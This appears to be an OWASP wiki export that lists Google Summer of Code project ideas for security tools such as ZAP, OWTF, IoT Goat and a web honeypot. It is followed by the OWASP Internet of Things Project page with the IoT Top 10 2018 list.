* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular, some UI/UX experience would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Your idea ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
You have an awesome idea to improve OWASP Juice Shop that is not on this list? Great, please submit it!<br />
<br />
''' Getting started '''<br />
* Get in touch with [https://www.owasp.org/index.php/User:Bjoern_Kimminich Bjoern Kimminich]<br />
<br />
'''Expected Results:'''<br />
* A new feature that makes OWASP Juice Shop even better<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Mentors:''' <br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
<br />
==OWASP-Securetea Tools Project ==<br />
The OWASP SecureTea Project is a application designed to help Secure a person's laptop or computer / server with IoT (Internet Of Things) for notify users (via various communication mechanisms), whenever someone accesses their computer / server. This application uses the touchpad/mouse/wireless mouse to determine activity and is developed in Python and tested on various machines (Linux, Mac & Windows)<br />
. -<br />
https://github.com/OWASP/SecureTea-Project/blob/master/README.md<br />
<br />
===Brief Explanation===<br />
We are looking any awesome idea to improve Securetea Project that is not on this list? We are expecting make this project will be useful to everyone to secure their Small IoT. <br />
<br />
===Idea===<br />
Below roadmap and expect results you can choose to improve Securetea Project . <br />
if any bugs please help to fix it<br />
<br />
===Roadmap=== <br />
See Our Roadmap<br><br />
https://github.com/OWASP/SecureTea-Project#roadmap<br><br />
<br />
===Expect Results ===<br />
<br><br />
Securetea Protection /firewall<br><br />
Securetea Antivirus<br><br />
Notify by Whatsapp<br><br />
Notify by SMS Alerts<br><br />
Notify by Line<br><br />
Notify by Telegram<br><br />
Intelligent Log Monitoring include Web Deface Detection<br><br />
Detection of malicious devices <br><br />
Login History<br><br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Javascript <br />
* Angular and NodeJS/Express<br />
* Database<br />
* Linux<br />
<br />
=== Mentors === <br />
<br />
* [mailto:ade.putra@owasp.org Ade Yoseman Putra] - (OWASP Securetea Project Leader) <br><br />
* [mailto:rejah.rehim@owasp.org Rejah Rehim.A.A]]- (OWASP Securetea Project Leader)<br />
<br><br />
<br />
==OWASP OWTF==<br />
'''[https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)]''' is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST. Most of the ideas below focus on rewrite of some major components of OWTF to make it more modular. OWTF is moving to a fresh codebase with a fully Docker testing and deployment environment. If you want to get a jumpstart, check out https://github.com/owtf/owtf/tree/new-arch.<br />
===OWASP OWTF - MiTM proxy interception and replay capabilities===<br />
'''Brief Explanation:'''<br />
<br />
The OWTF man-in-the-middle proxy is written completely in Python (based on the excellent Tornado framework) and was benchmarked to be the fastest MiTM python proxy. However it lacks the useful and much need interception and replay capabilities of mitmproxy (https://github.com/mitmproxy/mitmproxy).<br />
<br />
The current implementation of the MiTM proxy serves its purpose very well. Its fast but its not extensible. There are a number of good use cases for being extensible<br />
*ability to intercept the transactions<br />
*modify or replay transaction on the fly<br />
*add additional capabilities to the proxy (such as session marking/changing) without polluting the main proxy code<br />
Bonus:<br />
*Design and implement a proxy plugin (middleware) architecture so that the plugins can be defined separately and the user can choose what plugins to include dynamically (from the web interface).<br />
*Replace the current Requester (based on urllib, urllib2) with a more robust Requester based on the new urllib3 with support for a real headless browser factory. The typical flow when requested for an authenticated browser instance (using PhantomJS)<br />
<br />
*The "Requester" module checks if there is any login parameters provided (i.e form-based or script - look at https://github.com/owtf/login-sessions-plugin)<br />
*Create a browser instance and do the necessary login procedure<br />
*Handle the browser for the URI<br />
*When called to close the browser, do a clean logout and kill the browser instance.<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
'''Knowledge Prerequisite:''' Python proficiency, some previous exposure to security concepts and penetration testing is welcome but not strictly necessary as long as there is will to learn.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia][mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] OWASP OWTF Project Leaders<br />
===OWASP OWTF - Web interface enhancements===<br />
'''Brief explanation:'''<br />
<br />
The current web interface is a mixture of Tornado Jinja templates and ReactJS. A complete UI change to a stable ReactJS-based interface should be the deliverable for this project. Most of the hard part for the change has already been done and added in a separate branch at https://github.com/owtf/owtf/tree/develop.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT:Clean, maintainable (ES6 compatible and using recommended design patterns) React (JavaScript) code. ([https://github.com/getsentry/zeus/tree/master/webapp This] is a good example!)'''<br />
*'''IMPORTANT: Thoroughly documented code along with API examples and example future components.'''<br />
*'''CRITICAL''': Excellent reliability and performance.<br />
*Unit tests / Functional tests and easy to setup testing environment (preferably automated).<br />
'''Knowledge Prerequisite:''' Python (reading API source code and endpoints), React.JS (high proficiency) and general JavaScript proficiency.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia][mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] OWASP OWTF Project Leaders<br />
===OWASP OWTF - New plugin architecture===<br />
'''Brief explanation:'''<br />
<br />
The current plugin system is not very useful and it is painful to browse many plugins. Most of the plugins do have much code and most of is repeated - much refactoring needed there.<br />
<br />
This issue is documented in detail at https://github.com/owtf/owtf/issues/905.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
<br />
== OWASP iGoat (draft) ==<br />
'''Idea 1:''' Completing OWASP iGoat documentation at https://docs.igoatapp.com/ and creating demo videos at for OWASP iGoat YouTube channel for learning purpose.<br />
<br />
'''Idea 2:''' Adding new challenge pack / CTF for iGoat. It should be one point solution for learning iOS app security<br />
<br />
== OWASP Seraphimdroid ==<br />
[[OWASP SeraphimDroid Project|OWASP Seraphimdroid]] is Android security and privacy app, with features to enhance user's knowledge about security and privacy on his/her mobile device. If you are interested in this project and working on it during Google Summer of Code, please contact [[User:Nikola Milosevic|Nikola Milosevic]] and express your interest.<br />
<br />
=== Idea 1: Anomaly detection of device state ===<br />
The idea is that certain features of a device would be constantly monitored (battery use, internet usage, opp calls, etc.). Initially, the usual behaviour of the device would be learned. Later, anomalies normal behavior would be reported to the user. This should involve some explanations, such as which applications are causing an anomaly the device behaviors <br />
<br />
=== Idea 2: On device machine learning of maliciousness of an app ===<br />
Tensor-flow for on-device processing and some other libraries have been released that enable machine learning. We have previously applied a system, that based on permissions, is able to distinguish malicious apps from non-malicious. Now, we would like to learn also from other outputs and things one can monitor about application whether it can be malicious. <br />
<br />
=== Idea 3: Enhansing privacy features ===<br />
The vision of Seraphimdroid is to be aware of privacy threats. This may be achieved throug knowing which applications are using user accounts or other information that uthe user has on phone to send to the server, or just by knowing which applications may be doing it. Knowledgebase shouldbbeextending with the suggestions on how to improve privacy. Also, automated settings of various apps to use encryption should be proposed.<br />
==OWASP ZAP==<br />
[[OWASP Zed Attack Proxy Project]] (ZAP) The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers. Previous GSoC students have implemented key parts of the ZAP core functionality and have been offered (and accepted) jobs based on their work on ZAP.<br />
<br />
=== Active Scanning WebSockets ===<br />
: '''Brief Explanation:'''<br />
: ZAP has good support for websockets, and allows them to be intercepted, changed and fuzzed. Unfortunately it doesn't currently support active scanning (automated attacking) of websocket traffic (messages).<br />
: We would like to add active scanning support to websockets, ideally in a generic way which would allow us to reuse as many of our existing rules as are relevant. Adding additional websocket specific attacks would also be very useful.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* An pluggable infrastructure that allows us to active scan websockets<br />
:* Converting the relevant existing scan rules to work with websockets<br />
:* Implementing new websocket specific scan rules<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
<br />
=== Automated Authentication Detection and Configuration ===<br />
: '''Brief Explanation:'''<br />
: Currently a user must manually configure ZAP to handle authentication, eg as per <nowiki>https://github.com/zaproxy/zaproxy/wiki/FAQformauth</nowiki><br />
: This is time consuming and error prone.<br />
: Ideally ZAP would help detect login and registration pages and provide more assistance when configuring authentication, ideally being able to completely automate the task for as many sort of webapps as possible.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* Detect login and registration pages<br />
:* Provide a wizard to walk users through the process of setting up authentication, with as much assistance as possible<br />
:* An option to completely automate the authentication process, for as many authentication mechanisms as possible<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
:<br />
<br />
== IoT Goat ==<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf IoT Top 10 2018]. <br />
<br />
===Idea 1: Insecure firmware web application ecosystem===<br />
'''Brief Explanation:'''<br />
<br />
A vulnerable web application, and backend API/web services deployed in OpenWrt containing critical vulnerabilities showcasing the traditional IoT problems.<br />
<br />
''' Getting started '''<br />
* Have a look at the getting started page to get familiar with virtualizing OpenWrt: https://github.com/scriptingxss/IoTGoat#-getting-started-<br />
* Create a GitHub account to be added as a collaborator to the repository<br />
* Review the example vulnerabilities and challenges: https://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md<br />
<br />
'''Expected Results:'''<br />
<br />
Development of a simple web application user interface with web services and API's deployed locally on the OpenWrt firmware. Documented challenges of how to discover and remediate web software security vulnerabilities. The insecure web application services must contain the following vulnerabilities to be used with the IoT testing guide: <br />
* Command injection<br />
* SQL injection<br />
* Local file inclusion <br />
* XXE injection,Insufficient Authentication<br />
* Transfer sensitive data using insecure channels<br />
* Store sensitive data insecurely<br />
Vulnerable SOAP web services and REST API implementations are in-scope. <br />
<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Embedded and/or web development (nice to have)<br />
** Web application code can be developed using the following common embedded programming languages:<br />
*** Lua<br />
*** PHP<br />
*** C/C++<br />
*** JavaScript<br />
<br />
===Idea 2: Insecure network services===<br />
'''Brief Explanation:'''<br />
<br />
Deliberately insecure services configured within OpenWrt such as an miniupnp daemon configured with secure_mode off (Secure mode; client can only redirect an incoming port to the client itself (same IP as the request comes from), to demonstrate a port mapping attack where an attacker from inside the network exposes a service that typically should be behind a LAN to the internet). <br />
<br />
''' Getting started '''<br />
* Have a look at the getting started page to get familiar with virtualizing OpenWrt: https://github.com/scriptingxss/IoTGoat#-getting-started-<br />
* Create a GitHub account to be added as a collaborator to the repository<br />
* Review the example vulnerabilities and challenges: https://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md<br />
<br />
'''Expected Results:'''<br />
<br />
Documented challenges of how to discover and remediate insecure network service vulnerabilities. The network services can be inherently insecure or have insecure configurations that can be abused during the challenges.<br />
* Example of network insecure services include:<br />
** FTP<br />
** Telnet<br />
** miniupnpd<br />
** HTTP<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Network security<br />
<br />
===Idea 3: Insecure firmware build system===<br />
'''Brief Explanation:'''<br />
<br />
Develop custom firmware builds of the latest OpenWrt version (18.06) demonstrating the process of incorporating debug services/tools, misconfigurations, and usage of vulnerable software packages. <br />
<br />
''' Getting started '''<br />
* Review OpenWrt's developer guide to get familiar with creating custom firmware builds<br />
** https://openwrt.org/docs/guide-developer/start<br />
** https://openwrt.org/docs/guide-developer/build-system/install-buildsystem<br />
** https://github.com/openwrt/openwrt<br />
<br />
'''Expected Results:'''<br />
* Provide walkthrough examples of insecure design choices for building firmware. <br />
* Provide suggested mitigation security controls<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Embedded development (C/C++)<br />
<br />
===Suggest your own ideas===<br />
You may suggest additional challenges or ideas that fit this project's objectives.<br />
<br />
=== Mentors and Leaders ===<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)<br />
<br />
==OWASP Web Honeypot Project ==<br />
<br />
The goal of the OWASP Honeypot Project is to identify emerging attacks against web applications and report them to the community, in order to facilitate protection against such targeted attacks. Within this project, Anglia Ruskin University is leading the collection, storage and analysis of threat intelligence data. <br />
<br />
https://www.owasp.org/index.php/OWASP_Honeypot_Project<br />
<br />
https://github.com/OWASP/Honeypot-Project/<br />
<br />
<br />
===Brief Explanation===<br />
The purpose of this part of the project is to capture intelligence on attacker activity against web applications and utilise this intelligence as ways to protect software against attacks. Honeypots are an established industry technique to provide a realistic target to entice a criminal, whilst encouraging them to divulge the tools and techniques they use during an attack. Like bees to a honeypot. These honeypots are safely designed to contain no information of monetary use to an attacker, and hence provide no risk to the businesses implementing them. <br><br />
<br />
The project will create honeypots that the community can distribute within their own networks. With enough honeypots globally distributed, we will be in a position to aggregate attack techniques to better understand and protect against the techniques used by attackers. With this information, we will be in a position to create educational information, such as rules and strategies, that application writers can use to ensure that any detected bugs and vulnerabilities are closed. <br><br />
<br />
===Idea===<br />
Project progression: <br />
* Honeypot software. The honeypot software that is to be provided to the community to place in their networks has been written. Honeypots are available in a variety of forms, to make deployment as flexible as possible and appeal to a diverse a user set as possible.<br />
* Collection software. The centralised collection software has been written and evaluated in a student driven proof-of-concept project. Honeypots have been attacked in a laboratory situation and have reported both the steps taken by the attacker and what they have attacked, back to the collection software.<br />
* Rollout to the Community. The project now needs a dedicated infrastructure platform in place that is available to the entire community to start collecting intelligence back from community deployed honeypots. This infrastructure will run the collector software, analysis programmes and provide a portal for communicating our finds and recommendations back to the community in a meaningful manner.<br />
* Going Forward. Toolkits and skills used by attackers do not stand still. As existing bugs are plugged, others open. Follow up stages for the project will be to create a messaging system to automatically update the community on findings of significant risk in their existing code that requires attention. <br />
<br />
<br />
===Expect Results ===<br />
<br />
Some of the ideas from last year's summit<br />
<br />
* Setup Proof of Concept to understand how Mod Security baed Honeypot/Probe interacts with a receiving console (develop a VM and/or Docker based test solution to store logs from multiple probes).<br />
* Evaluate console options to visualise threat data received from ModSecurity Honeypots/probes in MosSecurity Audit Console, WAF-FLE, Fluent and bespoke scripts for single and multiple probes.<br />
* Develop a mechanism to convert from stored MySQL to JSON format.<br />
* Provide a mechanism to convert ModSecurity mlogc audit log output into JSON format.<br />
* Provide a mechanism to convert mlogc audit log output directly into ELK (ElasticSearch/Logstash/Kibana) to visualise the data.<br />
* Provide a mechanism to forward honest output into threat intelligence format such as STIX using something like the MISP project(https://www.misp-project.org) to share Threat data coming from the Honeypots making it easy to export/import data from formats such as STIX and TAXII., may require use of concurrent logs in a format that MISP can deal with.<br />
* Consider new alternatives for log transfer including the use of MLOGC-NG or other possible approaches.<br />
* Develop a new VM based honeypot/robe based on CRS v3.0.<br />
* Develop new alternative small footprint honeypot/probe formats utilising Docker & Raspberry Pi.<br />
* Develop machine learning approach to automatically be able to update the rule set being used by the probe based on cyber threat intelligence received.<br />
<br />
<br />
=== Students Requirements ===<br />
<br />
Some of the skills we are looking for:<br />
<br />
* Apache/Tomcat <br />
* Any experience of MISP<br />
* MySQL & JSON<br />
* ELK <br />
* STIX/TAXII<br />
* Python<br />
* ModSecurity/mlogc<br />
* OWASP Core RuleSet (CRS)<br />
* Linux<br />
* VM/Docker<br />
<br />
=== Mentors === <br />
<br />
* [mailto:adrian.winckles@owasp.org Adrian Winckles] - (OWASP Web Honeypot Project Leader) <br><br />
<br />
===Suggest your own ideas===<br />
<br />
You may suggest additional challenges or ideas that fit this project's objectives.<br />
<br />
==OWASP Risk Assessment Framework ==<br />
Tool projects aim to assessment more than one or many web application using owasp risk rating mathodologies.<br />
https://github.com/OWASP/RiskAssessmentFramework<br />
<br />
'''Idea 1:''' make dashboard with databases and can assess many website based owasp risk rating mathodologies, create graph and report in pdf,word & excel format.<br />
=== Mentors === <br />
* [mailto:ade.putra@owasp.org Ade Yoseman] - <br></div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248644OWASP Internet of Things Project2019-03-12T03:24:07Z<p>Aaron.guzman: /* ICS/SCADA Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
